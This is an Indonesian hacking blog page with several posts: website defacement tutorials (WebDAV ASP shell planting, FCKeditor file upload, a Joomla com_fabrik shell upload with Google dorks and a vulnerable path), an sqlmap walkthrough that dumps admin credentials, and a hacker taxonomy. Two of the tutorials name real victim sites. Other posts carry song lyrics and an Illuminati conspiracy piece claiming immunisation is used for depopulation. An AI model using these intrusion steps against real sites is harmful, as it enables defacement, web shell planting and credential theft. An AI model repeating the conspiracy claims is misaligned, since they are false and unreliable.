::

Navbar Bawah

Search This Blog

Rabu, 01 Mei 2013

Cara Mudah Deface Menggunakan Tools Webdav |BC4rt

Step:
1. Buka tool webdav yang telah di download tadi, klik tab 'webdav' lalu pilih 'Asp shell maker'
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

2. Pada setting Name of Your Shell bisa diubah sesuka kamu sob, lalu klik add site lalu masukkan website target, disini saya menjadikan www.beijingcoal.com/ sebagai target
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

3. Lalu klik serang!! jika muncul tulisan 'shell created' berarti kita sukses menanam shell ke situs tersebut, namun jika yang muncul 'Not Vulnerable Dav' berarti sobat harus mencari target yang lain karena target sobat tidak vuln terhadap webdav
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

4. Sekarang kita check hasil shell yang telah tertanam tadi, perhatikan gambar pada step nomor 3 diatas, yang saya beri garis biru adalah letak shellnya, copy ke browser lalu buka link tersebut, contoh: http://www.beijingcoal.com/Hmei7.asp;.txt
5. Setelah masuk ke directory web tersebut silahkan cari file yang kemungkinan adalah index dari web tersebut
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

6. Stelah ketemu file yang berisi index lalu klik pada icon pensil disampingnya untuk mengedit, hapus semua scriptnya lalu tukar dengan script deface kalian sob, kemudian klik kaydet untuk menyimpan
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

7. Oke, script indexnya sudah saya ganti dengan script saya, dan sekarang saya akan mengakses http://www.beijingcoal.com/ untuk melihat hasilnya
cara deface website, cara deface index homepage dengan webdav, menggunakan webdav untuk deface index website, cara mudah deface website untuk newbie, cara mengganti index website dengan menggunakan webdav

oke, homepage / index website tersebut berhasil saya deface, jika sewaktu-waktu tampilan website tersebut telah kembali normal itu berarti adminnya telah memperbaiki website tersebut sob

sekian Tutorial Deface Index Website dengan Webdav ini, ini hanya untuk pelajaran dan jangan merusak website orang lain sob, saya tidak menanggung atas semua resiko yang terjadi pada anda

 
*Dengan Pengubahan Seperlunya

Read More --►

Definisi Dan Klasifikasi Hacker|BC4rt

Hacker adalah seseorang yang memiliki kemampuan pada komputer dan sistem jaringan, kemampuan standar yang dimiliki seorang hacker adalah core programming dan network specialist. Hacker merupakan pengguna komputer yang mampu masuk kedalam sistem komputer melalui jaringan, baik untuk keperluan monitoring (melihat sistem), copying(pengambilan/pencurian data), atau crashing (merusak sistem komputer) targetnya.
Klasifikasi Hacker
Hacker terdiri dari beberapa jenis sesuai dengan sifatnya. Baik orang itu seorang sistem administrator maupun user yang ingin membobol sistem komputer kita. Klasifikasi hacker antaralain sebagai berikut:


• White Hats : merupakan hacker yang bekerja sebagai system analist,system administrator maupun security analist. White hats bekerja dalam sistem dan memiliki kemampuan yang tinggi untuk menjaga sistem agar tetap bekerja dengan baik dan tidak diacak-acak oleh orang lain. White Hats hackers rata-rata memiliki sertifikat kode etik hacker, misalnya CEH (Certified Ethical Hacker)
• Gray Hats : merupakan hacker yang bekerja offensivelly dan defensivelly. Gray Hats merupakan orang yang melakukan attacking terhadap sistem yang juga bekerja untuk membuat pertahanan terhadap sistem. Hacker tipe ini merupakan hacker yang membobol sistemnya untuk mendapatkan bugs dan lubang dari sistemnya yang kemudian mempelajari dan menutup lubang tersebut.
• Black Hats : merupakan hacker yang hanya bekerja sebagai attacker dan mengambil manfaat terhadap sistem yang diserangnya. Black hats merupakan hacker yang merusak sistem atau sering juga disebut sebagai cracker. Contoh aksi yang dilakukan oleh hacker Black Hats antara lain membobol situs perbankan, mengambil account (Carding), dsb.
• Suicide Hacker : Hacker yang bekerja persis seperti Black Hats Hacker, bersifat destruktif dan tidak peduli terhadap ancaman yang akan menimpa nya. Rata rata suicide hacker merupakan orang yang tidak memiliki tujuan yang jelas, hanya membobol, mengambil keuntungan, ingin terkenal dan tidak takut terhadap hukum.
Metodologi Hacking
Hacker dalam melancarkan misinya memilki beberapa langkah-langkah (metodologi), antara lain sebagai berikut:
• Information Gathering, Langkah pertama yang dilakukan oleh hacker adalah mendapatkan informasi tentang target yang akan diserangnya. Beberapa cara yang dilakukan dalam Information Gathering antara lain:
1. Find Vulnerability, mencari informasi target dengan melacak kelemahan (scanning) terhadap sistem target.
2. Revealing Error Message, mencari informasi dengan melihat pesan error yang terdapat pada sistem target.
3. Get Credential Info, mencari informasi penting dengan mengambil dari log, backup files, dll.
• Scanning/Sniff, langkah kedua yang dilakukan oleh hacker adalah dengan melakukan scanning atau sniffing terhadap sistem. Biasanya tahapan ini dilakukan dengan menggunakan berbagai tools, antara lain : nmap, superscan, tcpdump, wireshark, dsniff, nessus, dll.
• Attack/Exploit, selanjutnya hacker akan melakukan attacking/exploit terhadap sistem target. attacking ini adalah attacking pertama yang akan membuka jalan untuk proses attak selanjutnya. Tools yang sering dipakai untuk attacking antara lain: metasploit framewor, john the ripper, cain and abel, the-hydra, dll.
• Backdoor (Keep it Easy to Visit Again), selanjutnya hacker akan menanam sesuatu pada sistem atau melakukan patching/altering terhadap sistem untuk memudahkan proses attacking selanjutnya.
• Covering, langkah akhir yang dilakukan oleh hacker adalah covering your tracks, yakni menghapus jejak agar tidak dapat dilacak oleh sistem administrator. Covering biasanya dilakukan dengan:tunneling/proxy, rootkits atau mengedit/menghapus log.
Hirearkhi Hacker
Hacker memiliki hirearkhi/tingkatan, antara lain sebagai berikut:
• Trojan/Exploit Maker, tingkat hacker ini adalah tingkat tertinggi yang memiliki keahlian sangat baik dalam melakukan hacking dan memiliki kemampuan programming yang sangat baik. Hacker tipe ini membuat tools berupa trojan,exploit dll yang dapat dipergunakan untuk memudahkan proses hacking.
• Spammer/Phisser, tingkatan hacker ini merupakan hacker yang paling kaya, dikarenakan dia akan melakukan flooding terhadap sistem dan duplikasi sehingga mendapatkan informasi lebih banyak.
• Skimmer/Carder, tingkatan hacker ini merupakan hacker yang melakukan pencurian account, baik kartu kredit, ATM, transaksi online, dll.
• Defacer, merupakan tingkatan hacker yang tugasnya melakukan deface terhadap sistem.
• Logins/Database, merupakan hacker yang tugasnya hanya mencari account login dan melakukan serangan terhadap database.
• D-DOS, merupakan hacker yang tugasya melakukan perusakan terhadap service (Denial of service) yang ada pada sistem target.
• Software Cracker/Nuller, merupakan hacker yang tugasnya melakukan aktivasi/nulling terhadap software aplikasi.
• Reseller, merupakan hacker yang tugasnya hanya menjual kartu kredit hasil dari carding. Kebanyakan carder hanya melakukan carding dan memberikannya pada reseller untuk dijualkan.
• Cashier, merupakan hacker yang tugasnya menguangkan/mencairkan duit.
• Phreaker, merupakan hacker yang hanya mengambil manfaat terhadap sistem, contohnya internetan gratis,dll.
Kesimpulan:
• Hacker is Dangerous
• Most Of People are Victims
• Beware
Penanganannya dengan melakukan defence yang baik, defance yang paling baik adalah attack yang baik.


Read More --►

Lirik Lagu Anonymous - Illuminati ( F*CK FOR ILLUMINATI )|BC4rt

ILLUMINATI, YOU'VE COME TO TAKE CONTROL 
YOU CAN TAKE MY HEART BEAT 
BUT YOU CAN'T BREAK MY SOUL 
WE ALL SHALL BE FREE! 



ILLUMINATI, YOU'VE COME TO TAKE CONTROL 
YOUR NEW WORLD ORDER 
WILL LEAD TO NOT AT ALL 
WE ALL SHALL BE FREE! 



Open up your eyes; wake the fuck up America! 

Elite control your lives with fear; just scaring ya' 

With terror on your screen telling you what to believe 

But who benefits from panic, hunger, and greed 

That's how they feed upon the masses like a fucking disease 

The only answer is to rise up; get up off your fucking knees 

Tap into your inner-being like a 33rd degree 

I'm planting mental-seeds for man to break free of an evil creed 

You can't see, 'cause you ain't believing me, but I'm telling thee, 

That tele-v ain't truth; just professionally manufacturing 

A fallacy un-balancing your talents; we 

Tragically; waiting for things to fucking change magically 

& mystically; rewrite our fucking history; this ain't no bullshit mystery 

Unlock the prison with the key 

It's in your mind with no bars toÿ see! 



ILLUMINATI, YOU'VE COME TO TAKE CONTROL 
YOU CAN TAKE MY HEART BEAT 
BUT YOU CAN'T BREAK MY SOUL 
WE ALL SHALL BE FREE! 



ILLUMINATI, YOU'VE COME TO TAKE CONTROL 
YOUR NEW WORLD ORDER 
WILL LEAD TO NOT AT ALL 
WE ALL SHALL BE FREE! 



Fuck the internet; it took away your intellect 

It stripped you of respect, so now this is what you're left with 

What's the symptoms of distress? 

Witch prescription is the best? 

The deffinition of misdirection 

Doctor's orders; get some rest 

His hocus-pocus diognosis got you focusing on stress 

These politicians ain't no better 

Fit the discription of the devil 

Grab your pistols and get ready 

'Cause they're trying to play Geppetto 

Yeah they're trying to pull the strings 

Have us jumping through the rings 

But they treat like we're property 

We're fucking human biengs!... man 

Things are not thet way it seems; rarely 

See the American dream, 'cause it's more like a nightmare 

Fight fair? yeah I'll do that when a vote counts 

Yeah, I'll do that shit when they don't doubt 

Until then we're all anonymous on mission going all out! 


ILLUMINATI, YOU'VE COME TO TAKE CONTROL 
YOU CAN TAKE MY HEART BEAT 
BUT YOU CAN'T BREAK MY SOUL 
WE ALL SHALL BE FREE! 



ILLUMINATI, YOU'VE COME TO TAKE CONTROL 
YOUR NEW WORLD ORDER 
WILL LEAD TO NOT AT ALL 
WE ALL SHALL BE FREE! 
Read More --►

Anonymous Vs Illuminati|BC4rt


 Beberapa waktu lalu saya membaca sebuah artikel yang menarik di sebuah thread di kaskus, tentang bagaimana gerakan "Anonymous" bekerja. Segera saya tercengang melihat betapa sangat berbeda, kelompok ini mampu menyusun organisasi secara solid dan mandiri, bebas dari penagaruh organisasi antagonisnya yaitu “The World-Wide Illuminati” atau konspirasi New World Order, yang didasarkan pada piramida kekuasaan. Saya ingin menyajikan temuan-temuan saya dan berharap saya dapat membantu untuk meningkatkan kesadaran kita akan pentingnya gerakan "Anonymous".
  Apa Anonymous dan bagaimana cara kerjanya?

 Saya pribadi belum terlibat dalam gerakan Anonymous, tapi inilah yang saya temukan dari berbagai sumber. Mainstream media telah berbicara tentang hal ini, tetapi hanya sedikit memahami esensinya. Sebagian besar orang aktif dalam sesi IRC Anonymous (Internet Relay Chat) tidak dalam kegiatan hacker atau kracker, tapi disamping itu beberapa orang sengaja aktif didalamnya. Tidak ada struktur hirarkis, sehingga tidak ada pemimpin dalam Anonymous. Untuk pembentukan kelompok tertentu dan untuk tujuan tertentu individu dapat terlibat dengan anggota yang lain, tapi ini hanya menyangkut masalah ringan saja, tidak untuk berbicara mengenai tujuan khusus Anonymous, seperti membicarakan jumlah konkrit individu yang terlibat dalam sebuah kelompok, selain itu juga untuk memanipulasi data dan mengontrol gerakan dari pengamatan musuh-musuh mereka. Semua orang dapat bergabung dan melihat informasi dan laporan. Jika orang tidak setuju pada tindakan atau ide tertentu, mereka tidak perlu memberi kontribusi, tetapi mungkin akan bergabung dalam operasi berikutnya yg sesuai dengan sikap dan prinsip individu yg bersangkutan.


Struktural Dasar Anonymous adalah:
  • Para aktivis tidak mengetahui satu dengan yang lainnya, karena itu mereka "Anonymous"
  • “No Designated Leadership”; Setiap orang bisa memimpin di mana orang lain akan mengikuti.
  • “Open Informations”; Informasi bersifat terbuka
  • “Total Free Will”; setiap individu memutuskan sendiri, “Grass-Roots Democracy”; Semua orang memberikan kontribusi sesuai dengan kepentingan dan kemampuannya.
  • “Distributed Technical Structure”
  • “Only Small Common Agenda”

Struktural Dasar Illuminati adalah:
  • "Hirarki Mata Rantai Komando"
  • Sepenuhnya “Compartimented Structure” dengan cara vertikal dan horizontal; arus informasi diatur dari atas ke bawah (termasuk informasi yang bersifat menipu dan memaniulasi di berbagai tingkat).
  • "Infiltrasi" ke semua organisasi berpengaruh dunia (Perbankan, Pemerintahan Negara-negara berpenggaruh, PBB, Perusahaan, Media Informasi, Militer dan Gereja)
  • Semua informasi orang-orang yang berada di level bawah piramida diketahui oleh mereka yg berada di level atas, tetapi tidak sebaliknya.
  • Kejam, memaksa dengan kekerasan, menciptakan ketergantungan akan uang, menciptakan ketakutan untuk melancarkan agenda mereka
  • Organisasi besar, rahasia dan mempunyai agenda berbahaya (beberapa kata kunci yang telah dicatat yaitu: satu pemerintahan dunia dan agama, rekayasa sosial, manipulasi masyarakat, mengontrol pikiran dan media, penggurangan populasi dunia (Immunisasi, makanan dengan pewarna, perasa, penggawet yg dilegalkan), UFO dan Alien (merancukan, memanipulasi informasi yg terkait), senjata rahasia HAARP, menghalangi penemuan sumber energi alternatif terbarui (bahan bakar hydrogen), okultisme dan Setanisme)
 Melihat itu semua tidak salah bila kita menyimpulkan bahwa Illuminati adalah kebalikan dari Anonymous!, Ini adalah penemuan yang sedikit menarik ketika kita melanjutkan pertanyaan yang berkaitan dengan agama (religi).


karakteristik religius Illuminati didorong oleh

  • Keserakahan
  • Egoisme
  • Elit Berpikir
  • Kebencian Sesama dan
  • Membenci Tuhan; karena mereka berfaham okultisme, satanisme: penyembah dan pengikut setan
Dalam konteks itu saya akan mengatakan bahwa Anonymous adalah satu gerakan yang membantu orientasi spiritual positif di planet ini untuk mencapai keberhasilan. Ide-ide hak asasi manusia, keadilan, kesetaraan, sehingga memberikan kebaikan secara luas.

 Terima kasih untuk anonymous, Masa Depan kami segera dimula
 Ketakutan utama dari komplotan rahasia adalah angka. Mereka sedikit, kami sangat banyak. Berkat internet, legiun kita menjadi “Self Organized” dan tidak ada duanya.
 Tujuan Utama Anonymous :

 "Anonymous telah menyadarkan untuk melindungi hak-hak kebebasan dan semua hak-hak azasi manusia. Anonymous akan menggunakan segala cara yang tersedia untuk melakukan perlawanan sampai akhir, apapun yang terjadi."

*Oh iya Thanks buat Sumber dari Thread Ini 
 Sumber : Klik Disini
Read More --►

Selasa, 30 April 2013

Metode Deface Dengan Remote File Upload Exploit Vulnerability|BC4rt

Greets All

Kali ni Mr Q Bakal bagi trik deface dengan metode RFUEV ( Remote File Upload Exploit Vulnerability ) , Yap ! cara ini mungkin agan2 sudah banyak yang tau , tapi disini kita hanya mengulas saja ..

Langsung aja yoo 

Dork : 


  • inurl:editor/editor/filemanager/
  • inurl:HTMLEditor/editor/"

Steps :
  • Masukan salah satu Dork Diatas Kedalam Google
  • Pilih Salah Satu Target dari Sekian Banyak Hasil
  • Kemudian Kalian Akan Melihat Kode Berikut 
          editor/editor/filemanager/browser/mcpuk/images/icons/32
  • Ganti Kode Diatas Dengan Kode Dibawah Ini Lalu Tekan Enter
          editor/editor/filemanager/upload/test.html
  • Selanjutnya , kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.
  • Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.
  • Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.
  • Jika berhasil akan ada muncul " File Uploaded With No Errors "
  • Lalu Copykan Link Yang Ada Di Kotak " Uploaded File URL "
  • lalu pastekan di belakang website yg kamu deface . contoh : www.barrados.net/editor/images/L27.html
  • Jika berhasil kamu akan melihat script kamu muncul pada link yg tadi kamu deface

Nah itu tadi Teknik Deface menggunakan metode RFUEV , Sekian Dari Mr Q , Terimakasih
Read More --►

Exploit Dengan Joomla Component & Remote Shell Upload Vulnerability|BC4rt

Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 

Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik

Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV

Dan shell kita akan terletak di [site]/media/[shell.php]


Terus,  hajar !!!!
We Are Surabaya BlackHat !
Sekian tutorial kali ini, semoga bermanfaat.

Sumber : http://www.madura-cyber.org/2013/04/deface-dengan-joomla-component.html
Read More --►

Tutorial SQL Injection Dengan SQLMap | BC4rt

Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

biar lebih jelas saya akan menjelaskan sedikit tentang apa itu SQL injection dan database.

  • SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.
  • Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.
ok cukup penjelasanya, kita langsung aja ke tutorial sqlmap dalam memanipulasi bug SQL injection.

pertama download dulu sqlmap nya :
sqlmap.zip untuk file berekstensi .zip
sqlmap.tar.gz untuk file berekstensi tar.gz

setelah di download extract file sqlmap nya, saya sarankan di desktop saja agar lebih mudah untuk prosesnya, atau di direktori lain juga boleh tergantung dari selera kita masing-masing :-D . kemudian rename folder yang telah di extract menjadi "sqlmap" (tanpa tanda kutip).

tools ini adalah tools yang berbasis program python, jadi untuk menjalankanya kita harus menginstall program python. kalau kamu pengguna linux kamu tidak usah repot-repot untuk menginstall python karena di linux sudah ada. tapi kalau kamu pengguna windows, kamu harus menginstall program python terlebih dahulu.

download python :

Windows x86 MSI Installer (2.7.3) untuk windows x86/32 bit
Windows X86-64 MSI Installer (2.7.3) untuk windows 64 bit
Mac OS X 64-bit/32-bit x86-64/i386 Installer (2.7.3) untuk MAC OS X 10.6/10.7
www.python.org/ftp/python/2.7.3/python-2.7.3-macosx10.3.dmg untuk MAC OS 10.3 - 10.6

kalau sudah di download kita lanjut ke step berikutnya.
pertama buka dulu terminal (linux) atau CMD (windows) kemudia ketikkan

untuk linux :

user@linux:~$ cd /Desktop/sqlmap/ 
untuk windows :

C:\Documents and Settings\user> cd /desktop/sqlmap/
kemudian tekan enter. 

kita ke step selanjutnya, saya anggap kamu sudah mempunyai target kamu sendiri, kalau belum ada silahkan cari sendiri :-p .
disini saya umpamakan ada sebuah situs dengan domain name "https://www.target.com" . dan mempunyai vulnerability pada tag "index.php?id=7" dengan methode get. langsung saja kita kembali ke terminal ata cmd tadi dan ketikkan lagi

linux :
user@linux:/Desktop/sqlmap# ./sqlmap.py -u https://www.target.com/index.php?id=7 --dbs
windows :

C:\Documents and Settings\user\desktop\sqlmap>sqlmap.py -u https://www.target.com/index.php?id=7 --dbs
perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari target kita. asiikk !!!

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

  • information_schema
  • my_db
langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa ? mungkin feeling aja :-p

sekarang kita ketikkan lagi perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables
karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "./" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". saya umpamakan table-table tersebut adalah sebagai berikut.

  • admin
  • members
  • item
nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut. langsung aja kita ketikkan di terminal atau CMD perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns
 lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama columnya

  • ID
  • username
  • password
  • email_address
  • country
disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". maka saya akan kembali mengetikkan perintah

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump
 dan hasilnya saya mendapati sebagai berikut :


admin:123456:admin@target.com
 ini artinya :

  • admin = username
  • 123456 = password
  • admin@target.com = email_address
Nah sekarang kalian tinggal mencari admin loginnya :D


Sekian info dari Mr Q .
Read More --►